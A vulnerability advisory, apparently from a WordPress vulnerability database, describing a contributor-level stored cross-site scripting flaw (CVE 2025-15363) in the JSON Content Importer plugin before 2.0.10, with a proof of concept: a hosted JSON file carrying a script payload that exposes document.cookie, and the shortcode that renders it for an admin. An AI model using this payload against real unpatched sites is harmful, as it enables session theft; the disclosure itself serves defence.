Get Use APIs < 2.0.10 – Contributor+ Stored XSS | CVE 2025-15363 | Plugin Vulnerabilities

Description

The plugin executes imported JSON, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks under certain server configurations.

Proof of Concept

Environment Setup:

Make sure `mbstring` is not installed in PHP. Instructions for removing vary based on environment.

Create malicious JSON at public URL:

```
{
  "articles": [
    {
      "title": "<script>alert('XSS Attack! Cookie: ' + document.cookie)</script>",
      "author": "Attacker",
      "content": "This is a test"
    }
  ]
}
```

and host at a publically accessible URL, i.e. `https://example.com/xss.json`


Exploitation steps:


Login as Contributor and create a WordPress post with shortcode:

```
[jsoncontentimporter url="https://example.com/xss.json" basenode="articles"]
<div class="post">
<h2>{title}</h2>
By: {author}
<div>{content}</div>
</div>
[/jsoncontentimporter]
```

As admin, preview the drafted post. See the XSS alert showing the cookies.

Affects Plugins

json-content-importer

Fixed in 2.0.10

References

CVE

URL

https://www.php.net/manual/en/mbstring.installation.php

URL

https://doc.json-content-importer.com/json-content-importer/free-show-the-data/?keywords=%3Apurejsondata

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Ahmed Makawi

Submitter

Ahmed Makawi

Submitter website

https://www.linkedin.com/in/ahmed-makawi/

Verified

Yes

WPVDB ID

428d08bb-5329-4406-a785-131bae4ed085

Timeline

Publicly Published

2026-02-25 (about 21 days ago)

Added

2026-02-25 (about 20 days ago)

Last Updated

2026-02-25 (about 20 days ago)

Other

Published

Title

Published

2023-11-20

Title

Tainacan < 0.20.5 - Reflected Cross-Site Scripting

Published

2025-01-16

Title

VSTEMPLATE Creator <= 2.0.2 - Reflected Cross-Site Scripting

Published

2024-04-22

Title

Schema & Structured Data for WP & AMP < 1.30 - Authenticated (Contributor+) Stored Cross-Site Scripting via How To and FAQ Blocks

Published

2024-10-31

Title

NMR Strava activities < 1.0.8 - Contributor+ Stored XSS

Published

2024-06-21

Title

Page Builder Sandwich – Front-End Page Builder <= 5.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting